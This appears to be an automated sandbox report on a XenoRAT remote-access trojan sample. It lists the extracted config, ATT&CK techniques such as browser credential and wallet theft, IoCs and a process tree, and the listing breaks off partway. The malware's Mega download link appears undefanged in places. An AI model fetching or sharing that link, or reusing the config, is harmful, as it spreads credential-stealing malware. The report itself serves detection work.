xenorat | hxxps://mega[.]nz/file/LYdmSRaZ#l-kgi8-D4G9-coBXoeP7kl0PkteVSCyEV6YHg2o39jw

Analysis

max time kernel
49s
max time network
54s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01-10-2024 06:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/LYdmSRaZ#l-kgi8-D4G9-coBXoeP7kl0PkteVSCyEV6YHg2o39jw

Score

10^/10

xenorat collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xenorat

192.168.1.36

Mutex

Xeno_rat_nd8912d

Attributes

delay
5000
install_path
nothingset
port
4444
startup_name
nothingset

Signatures

Detect XenoRat Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023581-300.dat	family_xenorat
behavioral1/memory/5652-304-0x00000000007B0000-0x00000000007C2000-memory.dmp	family_xenorat

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5988	powershell.exe
5976	powershell.exe
5880	powershell.exe
5920	powershell.exe
6260	powershell.exe
5644	powershell.exe
5636	powershell.exe
696	powershell.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5720	powershell.exe
5328	cmd.exe
5772	cmd.exe
6148	powershell.exe

Executes dropped EXE 18 IoCs

pid	Process
4224	baguettetools.exe
5168	baguettetools.exe
5652	bound.exe
6052	baguettetools.exe
5212	baguettetools.exe
6088	baguettetools.exe
6804	baguettetools.exe
5892	baguettetools.exe
3820	baguettetools.exe
6464	baguettetools.exe
6124	baguettetools.exe
116	baguettetools.exe
6932	baguettetools.exe
3848	baguettetools.exe
3748	baguettetools.exe
1996	rar.exe
5164	baguettetools.exe
5280	baguettetools.exe

Loads dropped DLL 64 IoCs

pid	Process
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5168	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
5212	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
6804	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe
6124	baguettetools.exe
6124	baguettetools.exe
6124	baguettetools.exe
6124	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe
6124	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe
3820	baguettetools.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
91	discord.com
93	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
89	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
1228	tasklist.exe
6004	tasklist.exe
6132	tasklist.exe
6124	tasklist.exe
6712	tasklist.exe
6608	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002357a-236.dat	upx
behavioral1/memory/5168-240-0x00007FFA46470000-0x00007FFA46B35000-memory.dmp	upx
behavioral1/memory/5168-245-0x00007FFA4BA00000-0x00007FFA4BA25000-memory.dmp	upx
behavioral1/memory/5168-247-0x00007FFA59090000-0x00007FFA5909F000-memory.dmp	upx
behavioral1/files/0x0007000000023573-264.dat	upx
behavioral1/files/0x0007000000023572-263.dat	upx
behavioral1/files/0x0007000000023571-262.dat	upx
behavioral1/files/0x0007000000023570-261.dat	upx
behavioral1/files/0x000700000002356f-260.dat	upx
behavioral1/files/0x000700000002356e-259.dat	upx
behavioral1/files/0x000700000002356d-258.dat	upx
behavioral1/files/0x000700000002356b-257.dat	upx
behavioral1/files/0x000700000002357f-256.dat	upx
behavioral1/files/0x000700000002357e-255.dat	upx
behavioral1/files/0x000700000002357d-254.dat	upx
behavioral1/files/0x0007000000023579-251.dat	upx
behavioral1/files/0x0007000000023577-250.dat	upx
behavioral1/files/0x0007000000023578-246.dat	upx
behavioral1/files/0x000700000002356c-243.dat	upx
behavioral1/memory/5168-270-0x00007FFA48AA0000-0x00007FFA48ACD000-memory.dmp	upx
behavioral1/memory/5168-274-0x00007FFA471F0000-0x00007FFA47214000-memory.dmp	upx
behavioral1/memory/5168-276-0x00007FFA462F0000-0x00007FFA4646F000-memory.dmp	upx
behavioral1/memory/5168-272-0x00007FFA508A0000-0x00007FFA508BA000-memory.dmp	upx
behavioral1/memory/5168-283-0x00007FFA462B0000-0x00007FFA462E3000-memory.dmp	upx
behavioral1/memory/5168-286-0x00007FFA46470000-0x00007FFA46B35000-memory.dmp	upx
behavioral1/memory/5168-290-0x00007FFA4BA00000-0x00007FFA4BA25000-memory.dmp	upx
behavioral1/memory/5168-293-0x00007FFA471D0000-0x00007FFA471E4000-memory.dmp	upx
behavioral1/memory/5168-295-0x00007FFA4B9F0000-0x00007FFA4B9FD000-memory.dmp	upx
behavioral1/memory/5168-298-0x00007FFA45B80000-0x00007FFA45C9A000-memory.dmp	upx
behavioral1/memory/5212-352-0x00007FFA3BE20000-0x00007FFA3C4E5000-memory.dmp	upx
behavioral1/memory/5168-364-0x00007FFA462B0000-0x00007FFA462E3000-memory.dmp	upx
behavioral1/memory/5212-363-0x00007FFA471C0000-0x00007FFA471CF000-memory.dmp	upx
behavioral1/memory/5212-362-0x00007FFA43240000-0x00007FFA43265000-memory.dmp	upx
behavioral1/memory/5168-351-0x00007FFA462F0000-0x00007FFA4646F000-memory.dmp	upx
behavioral1/memory/5212-382-0x00007FFA3B470000-0x00007FFA3B48A000-memory.dmp	upx
behavioral1/memory/5212-383-0x00007FFA3B440000-0x00007FFA3B464000-memory.dmp	upx
behavioral1/memory/5168-381-0x00007FFA461E0000-0x00007FFA462AE000-memory.dmp	upx
behavioral1/memory/5212-387-0x00007FFA3B250000-0x00007FFA3B283000-memory.dmp	upx
behavioral1/memory/5212-389-0x00007FFA3B160000-0x00007FFA3B22E000-memory.dmp	upx
behavioral1/memory/5212-388-0x00007FFA3A6B0000-0x00007FFA3ABE3000-memory.dmp	upx
behavioral1/memory/5212-386-0x00007FFA3B290000-0x00007FFA3B29D000-memory.dmp	upx
behavioral1/memory/5212-416-0x00007FFA3B470000-0x00007FFA3B48A000-memory.dmp	upx
behavioral1/memory/5212-417-0x00007FFA3BE20000-0x00007FFA3C4E5000-memory.dmp	upx
behavioral1/memory/5212-415-0x00007FFA3B050000-0x00007FFA3B05D000-memory.dmp	upx
behavioral1/memory/5212-414-0x00007FFA3B060000-0x00007FFA3B074000-memory.dmp	upx
behavioral1/memory/5212-413-0x00007FFA3B160000-0x00007FFA3B22E000-memory.dmp	upx
behavioral1/memory/5212-412-0x00007FFA3A6B0000-0x00007FFA3ABE3000-memory.dmp	upx
behavioral1/memory/5212-411-0x00007FFA3B250000-0x00007FFA3B283000-memory.dmp	upx
behavioral1/memory/5212-410-0x00007FFA3B290000-0x00007FFA3B29D000-memory.dmp	upx
behavioral1/memory/5212-409-0x00007FFA3B2A0000-0x00007FFA3B2B9000-memory.dmp	upx
behavioral1/memory/5212-408-0x00007FFA3B2C0000-0x00007FFA3B43F000-memory.dmp	upx
behavioral1/memory/5212-407-0x00007FFA3B440000-0x00007FFA3B464000-memory.dmp	upx
behavioral1/memory/5212-405-0x00007FFA3B600000-0x00007FFA3B62D000-memory.dmp	upx
behavioral1/memory/5212-404-0x00007FFA471C0000-0x00007FFA471CF000-memory.dmp	upx
behavioral1/memory/5212-403-0x00007FFA43240000-0x00007FFA43265000-memory.dmp	upx
behavioral1/memory/5168-401-0x00007FFA45B80000-0x00007FFA45C9A000-memory.dmp	upx
behavioral1/memory/5212-400-0x00007FFA3B050000-0x00007FFA3B05D000-memory.dmp	upx
behavioral1/memory/5212-399-0x00007FFA3B060000-0x00007FFA3B074000-memory.dmp	upx
behavioral1/memory/5212-385-0x00007FFA3B2A0000-0x00007FFA3B2B9000-memory.dmp	upx
behavioral1/memory/5212-380-0x00007FFA3B2C0000-0x00007FFA3B43F000-memory.dmp	upx
behavioral1/memory/5168-379-0x00007FFA45CA0000-0x00007FFA461D3000-memory.dmp	upx
behavioral1/memory/5212-378-0x00007FFA3B600000-0x00007FFA3B62D000-memory.dmp	upx
behavioral1/memory/5168-350-0x00007FFA471F0000-0x00007FFA47214000-memory.dmp	upx
behavioral1/memory/5168-292-0x00007FFA59090000-0x00007FFA5909F000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5716	cmd.exe
5664	netsh.exe
5780	cmd.exe
6876	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3388	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6156	systeminfo.exe
6668	systeminfo.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
6616	taskkill.exe
3652	taskkill.exe
7124	taskkill.exe
6044	taskkill.exe
6332	taskkill.exe
4704	taskkill.exe
4288	taskkill.exe
5388	taskkill.exe
5720	taskkill.exe
3536	taskkill.exe
6984	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 677715.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
216	msedge.exe
216	msedge.exe
4848	msedge.exe
4848	msedge.exe
3736	identity_helper.exe
3736	identity_helper.exe
2668	msedge.exe
2668	msedge.exe
5644	powershell.exe
5644	powershell.exe
5636	powershell.exe
5636	powershell.exe
5976	powershell.exe
5976	powershell.exe
5636	powershell.exe
5644	powershell.exe
5644	powershell.exe
5720	powershell.exe
5720	powershell.exe
5976	powershell.exe
5976	powershell.exe
6192	powershell.exe
6192	powershell.exe
5720	powershell.exe
6192	powershell.exe
5880	powershell.exe
5880	powershell.exe
5880	powershell.exe
6092	powershell.exe
6092	powershell.exe
6092	powershell.exe
5920	powershell.exe
5920	powershell.exe
5920	powershell.exe
6424	powershell.exe
6424	powershell.exe
6424	powershell.exe
696	powershell.exe
696	powershell.exe
6260	powershell.exe
6260	powershell.exe
696	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	2952	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2952	AUDIODG.EXE
Token: SeDebugPrivilege	5644	powershell.exe
Token: SeDebugPrivilege	5636	powershell.exe
Token: SeDebugPrivilege	6004	tasklist.exe
Token: SeDebugPrivilege	5976	powershell.exe
Token: SeDebugPrivilege	6132	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5420	WMIC.exe
Token: SeSecurityPrivilege	5420	WMIC.exe
Token: SeTakeOwnershipPrivilege	5420	WMIC.exe
Token: SeLoadDriverPrivilege	5420	WMIC.exe
Token: SeSystemProfilePrivilege	5420	WMIC.exe
Token: SeSystemtimePrivilege	5420	WMIC.exe
Token: SeProfSingleProcessPrivilege	5420	WMIC.exe
Token: SeIncBasePriorityPrivilege	5420	WMIC.exe
Token: SeCreatePagefilePrivilege	5420	WMIC.exe
Token: SeBackupPrivilege	5420	WMIC.exe
Token: SeRestorePrivilege	5420	WMIC.exe
Token: SeShutdownPrivilege	5420	WMIC.exe
Token: SeDebugPrivilege	5420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5420	WMIC.exe
Token: SeRemoteShutdownPrivilege	5420	WMIC.exe
Token: SeUndockPrivilege	5420	WMIC.exe
Token: SeManageVolumePrivilege	5420	WMIC.exe
Token: 33	5420	WMIC.exe
Token: 34	5420	WMIC.exe
Token: 35	5420	WMIC.exe
Token: 36	5420	WMIC.exe
Token: SeDebugPrivilege	5720	powershell.exe
Token: SeDebugPrivilege	6124	tasklist.exe
Token: SeDebugPrivilege	6192	powershell.exe
Token: SeIncreaseQuotaPrivilege	5420	WMIC.exe
Token: SeSecurityPrivilege	5420	WMIC.exe
Token: SeTakeOwnershipPrivilege	5420	WMIC.exe
Token: SeLoadDriverPrivilege	5420	WMIC.exe
Token: SeSystemProfilePrivilege	5420	WMIC.exe
Token: SeSystemtimePrivilege	5420	WMIC.exe
Token: SeProfSingleProcessPrivilege	5420	WMIC.exe
Token: SeIncBasePriorityPrivilege	5420	WMIC.exe
Token: SeCreatePagefilePrivilege	5420	WMIC.exe
Token: SeBackupPrivilege	5420	WMIC.exe
Token: SeRestorePrivilege	5420	WMIC.exe
Token: SeShutdownPrivilege	5420	WMIC.exe
Token: SeDebugPrivilege	5420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5420	WMIC.exe
Token: SeRemoteShutdownPrivilege	5420	WMIC.exe
Token: SeUndockPrivilege	5420	WMIC.exe
Token: SeManageVolumePrivilege	5420	WMIC.exe
Token: 33	5420	WMIC.exe
Token: 34	5420	WMIC.exe
Token: 35	5420	WMIC.exe
Token: 36	5420	WMIC.exe
Token: SeDebugPrivilege	6616	taskkill.exe
Token: SeDebugPrivilege	3652	taskkill.exe
Token: SeDebugPrivilege	5388	taskkill.exe
Token: SeDebugPrivilege	5720	taskkill.exe
Token: SeDebugPrivilege	3536	taskkill.exe
Token: SeDebugPrivilege	6984	taskkill.exe
Token: SeDebugPrivilege	7124	taskkill.exe
Token: SeDebugPrivilege	6044	taskkill.exe
Token: SeDebugPrivilege	6332	taskkill.exe
Token: SeDebugPrivilege	4704	taskkill.exe
Token: SeDebugPrivilege	4288	taskkill.exe
Token: SeDebugPrivilege	5880	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe
4848	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4848 wrote to memory of 1792	4848	msedge.exe	82
PID 4848 wrote to memory of 1792	4848	msedge.exe	82
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 3204	4848	msedge.exe	83
PID 4848 wrote to memory of 216	4848	msedge.exe	84
PID 4848 wrote to memory of 216	4848	msedge.exe	84
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85
PID 4848 wrote to memory of 4144	4848	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/LYdmSRaZ#l-kgi8-D4G9-coBXoeP7kl0PkteVSCyEV6YHg2o39jw
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa591d46f8,0x7ffa591d4708,0x7ffa591d4718
  2⤵
  PID:1792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
  2⤵
  PID:4144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  PID:1980
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:4508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:4512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5488 /prefetch:8
  2⤵
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3444 /prefetch:8
  2⤵
  PID:1844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
